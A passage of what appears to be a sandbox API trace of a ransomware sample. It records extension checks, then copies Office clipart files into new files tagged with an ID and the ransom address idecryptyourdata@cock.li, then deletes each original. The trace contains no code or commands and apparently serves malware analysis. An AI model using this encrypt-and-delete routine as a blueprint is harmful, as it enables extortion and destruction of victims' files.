4 [0061.823] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString=".bz2") returned 4 [0061.823] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.823] lstrlenW (lpString=".7z") returned 3 [0061.823] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.823] lstrlenW (lpString=".dbf") returned 4 [0061.823] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.823] lstrlenW (lpString=".1cd") returned 4 [0061.823] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.823] lstrlenW (lpString=".jpg") returned 4 [0061.823] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.823] lstrlenW (lpString=".doc") returned 4 [0061.823] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.823] lstrlenW (lpString=".docx") returned 5 [0061.823] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.823] lstrlenW (lpString=".pdf") returned 4 [0061.823] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString=".xls") returned 4 [0061.824] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.824] lstrlenW (lpString=".xlsx") returned 5 [0061.824] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.824] lstrlenW (lpString=".ppt") returned 4 [0061.824] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.824] lstrlenW (lpString=".zip") returned 4 [0061.824] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.824] lstrlenW (lpString=".rar") returned 4 [0061.824] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.824] lstrlenW (lpString=".bz2") returned 4 [0061.824] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.824] lstrlenW (lpString=".7z") returned 3 [0061.824] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.824] lstrlenW (lpString=".dbf") returned 4 [0061.824] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.824] lstrlenW (lpString=".1cd") returned 4 [0061.824] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.824] lstrlenW (lpString=".jpg") returned 4 [0061.824] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.824] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.824] lstrlenW (lpString="AN00010_.WMF") returned 12 [0061.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.825] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3026) returned 1 [0061.825] CloseHandle (hObject=0x340) returned 1 [0061.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 0x220 [0061.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.825] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.825] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.825] GetLastError () returned 0x0 [0061.825] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xbd2, lpOverlapped=0x0) returned 1 [0061.834] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xbe0, lpOverlapped=0x0) returned 1 [0061.835] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.835] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.835] SetEndOfFile (hFile=0x358) returned 1 [0061.835] CloseHandle (hObject=0x358) returned 1 [0061.836] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.836] SetEndOfFile (hFile=0x340) returned 1 [0061.836] CloseHandle (hObject=0x340) returned 1 [0061.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0061.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.837] lstrlenW (lpString=".doc") returned 4 [0061.837] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.837] lstrlenW (lpString=".docx") returned 5 [0061.837] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.837] lstrlenW (lpString=".pdf") returned 4 [0061.837] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.837] lstrlenW (lpString=".xls") returned 4 [0061.837] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.837] lstrlenW (lpString=".xlsx") returned 5 [0061.837] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.837] lstrlenW (lpString=".ppt") returned 4 [0061.837] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.838] lstrlenW (lpString=".zip") returned 4 [0061.838] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.838] lstrlenW (lpString=".rar") returned 4 [0061.838] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString=".bz2") returned 4 [0061.838] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString=".7z") returned 3 [0061.838] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.838] lstrlenW (lpString=".dbf") returned 4 [0061.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.838] lstrlenW (lpString=".1cd") returned 4 [0061.838] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.838] lstrlenW (lpString=".jpg") returned 4 [0061.838] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.838] lstrlenW (lpString=".doc") returned 4 [0061.838] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString=".docx") returned 5 [0061.838] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.838] lstrlenW (lpString=".pdf") returned 4 [0061.838] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.838] lstrlenW (lpString=".xls") returned 4 [0061.838] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.838] lstrlenW (lpString=".xlsx") returned 5 [0061.838] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.838] lstrlenW (lpString=".ppt") returned 4 [0061.838] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.839] lstrlenW (lpString=".zip") returned 4 [0061.839] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.839] lstrlenW (lpString=".rar") returned 4 [0061.839] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.839] lstrlenW (lpString=".bz2") returned 4 [0061.839] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.839] lstrlenW (lpString=".7z") returned 3 [0061.839] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.839] lstrlenW (lpString=".dbf") returned 4 [0061.839] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.839] lstrlenW (lpString=".1cd") returned 4 [0061.839] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0061.839] lstrlenW (lpString=".jpg") returned 4 [0061.839] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.847] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.847] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.848] GetLastError () returned 0x0 [0061.848] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1634, lpOverlapped=0x0) returned 1 [0061.860] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1640, lpOverlapped=0x0) returned 1 [0061.861] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.861] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.861] SetEndOfFile (hFile=0x370) returned 1 [0061.865] CloseHandle (hObject=0x370) returned 1 [0061.865] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.865] SetEndOfFile (hFile=0x350) returned 1 [0061.866] CloseHandle (hObject=0x350) returned 1 [0061.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.867] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0061.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0061.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0061.867] lstrlenW (lpString=".doc") returned 4 [0061.867] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.867] lstrlenW (lpString=".docx") returned 5 [0061.867] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.867] lstrlenW (lpString=".pdf") returned 4 [0061.867] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.867] lstrlenW (lpString=".xls") returned 4 [0061.867] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.867] lstrlenW (lpString=".xlsx") returned 5 [0061.867] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.868] lstrlenW (lpString=".ppt") returned 4 [0061.868] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0061.868] lstrlenW (lpString=".zip") returned 4 [0061.868] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.868] lstrlenW (lpString=".rar") returned 4 [0061.868] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.868] lstrlenW (lpString=".bz2") returned 4 [0061.868] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.868] lstrlenW (lpString=".7z") returned 3 [0061.868] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0061.868] lstrlenW (lpString=".dbf") returned 4 [0061.868] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0061.868] lstrlenW (lpString=".1cd") returned 4 [0061.868] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0061.868] lstrlenW (lpString=".jpg") returned 4 [0061.868] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.871] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.871] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.873] GetLastError () returned 0x0 [0061.873] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2a50, lpOverlapped=0x0) returned 1 [0061.978] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2a60, lpOverlapped=0x0) returned 1 [0061.979] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.979] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.979] SetEndOfFile (hFile=0x370) returned 1 [0061.979] CloseHandle (hObject=0x370) returned 1 [0061.979] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.979] SetEndOfFile (hFile=0x368) returned 1 [0061.980] CloseHandle (hObject=0x368) returned 1 [0061.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.981] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0061.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0061.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0061.981] lstrlenW (lpString=".doc") returned 4 [0061.981] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.981] lstrlenW (lpString=".docx") returned 5 [0061.981] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.981] lstrlenW (lpString=".pdf") returned 4 [0061.981] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.981] lstrlenW (lpString=".xls") returned 4 [0061.981] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.981] lstrlenW (lpString=".xlsx") returned 5 [0061.981] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.981] lstrlenW (lpString=".ppt") returned 4 [0061.981] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0061.981] lstrlenW (lpString=".zip") returned 4 [0061.981] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.981] lstrlenW (lpString=".rar") returned 4 [0061.981] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.981] lstrlenW (lpString=".bz2") returned 4 [0061.981] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.981] lstrlenW (lpString=".7z") returned 3 [0061.981] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0061.981] lstrlenW (lpString=".dbf") returned 4 [0061.981] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0061.982] lstrlenW (lpString=".1cd") returned 4 [0061.982] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0061.982] lstrlenW (lpString=".jpg") returned 4 [0061.982] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.988] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.988] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.988] GetLastError () returned 0x0 [0061.989] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x63c, lpOverlapped=0x0) returned 1 [0062.021] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x640, lpOverlapped=0x0) returned 1 [0062.022] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.022] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.023] SetEndOfFile (hFile=0x340) returned 1 [0062.023] CloseHandle (hObject=0x340) returned 1 [0062.023] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.024] SetEndOfFile (hFile=0x344) returned 1 [0062.024] CloseHandle (hObject=0x344) returned 1 [0062.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0062.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0062.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0062.025] lstrlenW (lpString=".doc") returned 4 [0062.025] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.025] lstrlenW (lpString=".docx") returned 5 [0062.025] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.025] lstrlenW (lpString=".pdf") returned 4 [0062.025] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.025] lstrlenW (lpString=".xls") returned 4 [0062.025] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.025] lstrlenW (lpString=".xlsx") returned 5 [0062.025] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.025] lstrlenW (lpString=".ppt") returned 4 [0062.025] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0062.025] lstrlenW (lpString=".zip") returned 4 [0062.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.025] lstrlenW (lpString=".rar") returned 4 [0062.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.025] lstrlenW (lpString=".bz2") returned 4 [0062.026] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.026] lstrlenW (lpString=".7z") returned 3 [0062.026] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0062.026] lstrlenW (lpString=".dbf") returned 4 [0062.026] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0062.026] lstrlenW (lpString=".1cd") returned 4 [0062.026] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.026] lstrlenW 